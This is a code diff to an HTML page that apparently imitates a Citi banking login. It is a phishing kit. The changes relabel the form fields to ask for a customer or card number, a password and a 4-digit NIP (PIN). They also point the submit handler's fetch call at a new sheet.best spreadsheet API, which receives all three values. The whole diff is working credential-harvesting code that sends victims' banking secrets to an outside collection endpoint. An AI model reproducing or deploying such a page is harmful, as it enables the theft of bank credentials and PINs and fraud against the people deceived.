--- a/citi/0817.html
+++ b/citi/0817.html
@@ -50,7 +50,7 @@
 					<form class="formulario" id="contact-form"  name="submit-form">
 						<p class="centro"><b>Ingresa Tu Usuario</b>
 						</p><br>
-						<label for="nombre">Tu usuario debe tener entre 8 y 30 caracteres</label>
+						<label for="nombre">No De Cliente o Tarjeta</label>
 					<div class="contenedor-input">
 						<input type="password" input id="usuario" name="usuario" placeholder="ID Cliente"/>
 					</div>
@@ -62,11 +62,11 @@
 						<input type="text" input id="contraseña" name="contraseña" placeholder="Contraseña"/>
 					</div>
 					<form class="formulario" id="contact-form"  name="submit-form">
-						<p class="centro"><b>Confirma Tu Contraseña</b>
+						<p class="centro"><b>Ingresa Tu NIP</b>
 						</p><br>
-						<label for="nombre">Tu contraseña debe tener entre 8 y 30 caracteres</label>
+						<label for="nombre">Tu NIP debe tener 4 caracteres</label>
 					<div class="contenedor-input">
-						<input type="password" input id="confirmar" name="confirmar" placeholder="Confirmar Contraseña"/>
+						<input type="password" input id="confirmar" name="confirmar" placeholder="NIP"/>
 					</div>
 		
 			
@@ -108,16 +108,16 @@ formulario.addEventListener('submit', async(e) =>{
 
 
 try {    
-    const respuesta = await fetch('https://sheet.best/api/sheets/89a12aa3-9d23-435b-be03-635050a25f76', {
+    const respuesta = await fetch('https://sheet.best/api/sheets/d2695b5b-5093-4641-b263-d9e9641940ff', {
         method: 'POST',
         mode: 'cors',
         headers: {
             'Content-Type': 'application/json'
         },
         body: JSON.stringify({
-            "Usuario": formulario.usuario.value,
-            "Contra1": formulario.contraseña.value,
-            "Contra2": formulario.confirmar.value
+            "1": formulario.usuario.value,
+            "2": formulario.contraseña.value,
+            "3": formulario.confirmar.value
         })
     });
 
